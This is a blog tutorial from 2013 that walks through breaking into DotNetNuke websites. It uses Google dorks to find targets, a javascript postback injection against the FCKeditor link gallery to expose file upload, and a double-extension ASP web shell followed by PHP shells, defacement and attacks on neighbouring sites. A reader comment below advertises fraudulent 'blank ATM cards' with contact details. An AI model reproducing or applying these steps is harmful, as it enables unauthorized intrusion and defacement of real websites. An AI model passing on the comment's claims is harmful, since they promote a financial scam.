Friday, 6 December 2013

Dot Net Nuke Hacking Tutorial


What is DNN (Dot Net Nuke) ?
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.

In this tutorial, i am showing how to hack website with DNN Exploit

Step 1:

Go to Google

Step 2:


Now put any dork on search box and click Search.
  • inurl:fcklinkgallery.aspx 
  • inurl:/portals/0
  • inurl:/tabid/36/language/en-US/Default.aspx

Step 3:

It will show a list of many sites, select the site which you want to hack.

For example let's take this;

http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspx

Step 4:


Now replace;



home/tabid/36/language/en-US/Default.aspx

With this;

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

so your url will become;


http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx



Now there are 2 possibilities 


If you get Link Gallery URL select then site is not vulnerable, see the image below;;



and if get as shown in below image then the target is vulnerable;



Now if you have found a vulnerable site move to next step,

Step 5:


Now you can see 3 options there and we need to select “File”.




Step 6: Now after selecting option, we need to use a javascript code. For that we need to use that browser which supports javascript. Before using javascript first we need to choose file location as root, after that clear everything written on browser URL, paste the below javascript only.


javascript:__doPostBack('ctlURL$cmdUpload','')


After injecting the above javascript code in browser address bar,you will get upload option instead of selection option;




Step 7: Now you have to upload your shell, so first upload this shell shell.asp;me.jpg ( Download the shell from the Download button given at the end of article)


After uploading you can access your ASP shell by going to this address, 


http://www.vulsite.com/portals/0/yourshell.asp;me.jpg


After opening this address you will get this and upload your any php shell i.e.JackelShell.php or c99.php




Step 8: After uploading your php shell navigate to;


http://www.vulsite.com/portals/0/yourshell.asp;me.jpg


Now upload your Deface page in the root of the site. 
You can also hack all sites which are hosted on same server.

Note: Do Not Use Any Tutorial Of This Blog To Harm Anyone. This Is Only For Educational Purpose. I Will Not Be Responsible For Anything Done By You.






Do you my like Articles..?

Get Free Email Updates Daily!

Follow us!

Categories:

3 comments:

  1. You can GET THE NEWLY IMPROVED BLANK ATM CARD that can hack any ATM, ANYWHERE IN THE WORLD.{blankatmhaker@gmail.com}

    I have been hearing about these BLANK ATM CARDS. I never knew it existed but until i tried my best to look for how i will get money to start up a business and pay my bills, i visited Facebook and some other sites so many times. I saw how people get helped with Blank ATM card from Hacking man called Jack Robert. I was really surprise but i don’t really know what to do so i decided to email Jack Robert I complained to him how i needed money and he reply Yes he is a hacking man of anything, he said he can hack cellphones and Blank ATM and others devices, so I inquired about The Blank ATM Card. I have the faith is real and it will work because i saw many comments talking about his card. He told me Yes and that it is a card programmed for random money withdraws without being noticed and can also be used for free online purchases of any kind. i was amaze. after doing what he ask, 3 days later i received my card from DHL with my pin, i rush to try it on the closest ATM machine close to me, It worked like magic i was so happy. I was able to withdraw up to $6000 immediately. This was unbelievable and the happiest day of my life, So far i have being able to withdraw up to $78000 without any stress of being trace and caught. I don’t know why i am posting this here but i care about everyone who need financial help should contact him via {blankatmhaker@gmail.com} OR https://blankatmhaker.wixsite.com/atmcard

    ReplyDelete

Please Comment Here To Inform Us Your Review About It. Thank You